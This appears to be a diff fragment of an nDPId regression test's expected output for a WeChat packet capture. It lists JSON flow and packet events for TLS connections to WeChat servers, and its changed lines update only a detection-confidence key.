00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1492167367227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367227,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0lZ9AAEAGf6XAqAFny82XotNMAbt+X1Ic0q3OvIAQAOVJ0gAAAQEICgAwx9RF0bHC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1492167367489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367489,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG7002nXL3IaYSXp6ASN8hVJQAAAgQFoAQCCApFrUycADDHwwEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1492167367489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367489,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0UGZAAEAGxN7AqAFny82XotNNAbtphJenp1y9yYAQAOW6bQAAAQEICgAwyBZFrUyc"} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167366908,"flow_last_seen":1492167367549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167367549,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167366908,"flow_last_seen":1492167367550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167367550,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167377896,"flow_last_seen":1492167377896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167377896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1492167377896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KM9AAEAGqhzAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT1vHQAAAQEICgAw0kAycerX"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1492167377936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167377936,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0Fj0AADQGCA\/YOs2OwKgBZwG7wnvXK\/KwzDlUhIAQAVQWugAAAQEICjJymzYAMHos"} 
@@ -113,25 +113,25 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1492167378926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167378926,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cOpAAEAGpFLAqAFny82XotNPAbtxraOrAAAAAKACchDymgAAAgQFtAQCCAoAMNNBAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1492167379033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379033,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG7005qx4IjSnNKJ6ASN8i96gAAAgQFoAQCCApF0b0+ADDTAgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1492167379034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379034,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0mSVAAEAGfB\/AqAFny82XotNOAbtKc0onaseCJIAQAOUjLAAAAQEICgAw01xF0b0+"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378674,"flow_last_seen":1492167379034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167379034,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1492167379279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167379279,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG7009k83t+ca2jrKASN8iurAAAAgQFoAQCCApFrVgaADDTQQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1492167379279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167379279,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cOtAAEAGpFnAqAFny82XotNPAbtxraOsZPN7f4AQAOUT8AAAAQEICgAw05lFrVga"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167378674,"flow_last_seen":1492167379396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167379396,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378674,"flow_last_seen":1492167379397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167379397,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167380581,"flow_last_seen":1492167380581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167380581,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1492167380581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380581,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8GvtAAEAG+kHAqAFny82XotNQAbtFV84kAAAAAKACchDy2AAAAgQFtAQCCAoAMNTfAAAAAAEDAwc="} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 